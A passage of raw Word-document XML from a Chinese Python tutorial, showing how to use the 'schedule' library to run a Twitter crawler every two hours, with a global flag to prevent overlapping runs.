          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00475134">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CB7B07" w14:textId="77777777" w:rsidR="007C67C1" w:rsidRPr="00475134" w:rsidRDefault="007C67C1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00475134">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    schedule.run_pending()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0E0AA9" w14:textId="0D3B6907" w:rsidR="003452BB" w:rsidRDefault="007C67C1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00475134">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    time.sleep(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B24F308" w14:textId="77777777" w:rsidR="003452BB" w:rsidRDefault="003452BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A86B4B3" w14:textId="4B1DEBF8" w:rsidR="004A18D7" w:rsidRDefault="009B3D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FD0155" w14:textId="77777777" w:rsidR="004A18D7" w:rsidRDefault="004A18D7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A338583" w14:textId="77777777" w:rsidR="00B83EAC" w:rsidRDefault="00B83EAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def job(message, count):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7595ACA8" w14:textId="77777777" w:rsidR="00B83EAC" w:rsidRDefault="00B83EAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    for i in range(count):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0DA078" w14:textId="77777777" w:rsidR="00B83EAC" w:rsidRDefault="00B83EAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        print(message)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D1E3C0" w14:textId="77777777" w:rsidR="00B83EAC" w:rsidRDefault="00B83EAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6989B465" w14:textId="5A1B1384" w:rsidR="003452BB" w:rsidRDefault="00B83EAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00475134">
        <w:t>schedule.every(2).hours.do(job, message="It's time!", count=3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76ADC7AB" w14:textId="77777777" w:rsidR="003D7DD3" w:rsidRDefault="003D7DD3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="239A4ACE" w14:textId="77777777" w:rsidR="003D7DD3" w:rsidRDefault="003D7DD3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BB2E32E" w14:textId="4AF93A46" w:rsidR="00C859DF" w:rsidRDefault="00C859DF" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="558" w:name="_Toc159779991"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实际案例：</w:t>
      </w:r>
      <w:r w:rsidR="0059034F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每两个小时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定时运行推特爬虫</w:t>
      </w:r>
      <w:bookmarkEnd w:id="558"/>
    </w:p>
    <w:p w14:paraId="61028C23" w14:textId="77777777" w:rsidR="00C859DF" w:rsidRDefault="00C859DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="767659FC" w14:textId="77777777" w:rsidR="00C73070" w:rsidRDefault="00C73070" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>schedule.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>every</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>).hours.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>do</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(search_tweets)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">__name__ == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"__main__"</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t = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Thread</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=statuses_show_Thread)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    t.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>start</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61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>search_tweets</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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>运行定时任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>while True</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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t># search_tweets()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>旧的需要单个访问的队列就不要了，清空</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>schedule.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>run_pending</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time.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sleep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFA6B18" w14:textId="77777777" w:rsidR="00C859DF" w:rsidRPr="00C73070" w:rsidRDefault="00C859DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E242917" w14:textId="0A8B3445" w:rsidR="00C859DF" w:rsidRDefault="00C73070" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果每</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个小时运行，这里面间隔会很大，一开始不会执行程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01414233" w14:textId="77777777" w:rsidR="00C859DF" w:rsidRDefault="00C859DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="733CDB3B" w14:textId="2450C60B" w:rsidR="00C859DF" w:rsidRDefault="0032598E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>你可以在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之前先把函数运行一下，这样就会先运行函数，再每</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个小时执行，很快就可以看到运行程序就有输出内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B39C3F" w14:textId="77777777" w:rsidR="00C859DF" w:rsidRDefault="00C859DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19184F50" w14:textId="67B53899" w:rsidR="00C859DF" w:rsidRDefault="00EA2F34" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果由于此设计，想避免重复执行，可以</w:t>
      </w:r>
      <w:r w:rsidR="00A66FAF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设计一个全局变量当锁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCFAA9C" w14:textId="77777777" w:rsidR="00EA2F34" w:rsidRDefault="00EA2F34" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>避免</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>search_tweets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>重复执行，上个锁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">search_tweets_lock_flag = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711757BE" w14:textId="77777777" w:rsidR="00B62939" w:rsidRDefault="00B62939" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>search_tweets</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">global </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>search_tweets_lock_flag</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">global </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>FIFO_queue</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">global </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">search_tweets_lock_flag == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>True</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log_debug.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>info</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>存在重复请求执行，已拒绝</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">search_tweets_lock_flag = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>log_debug.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>info</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
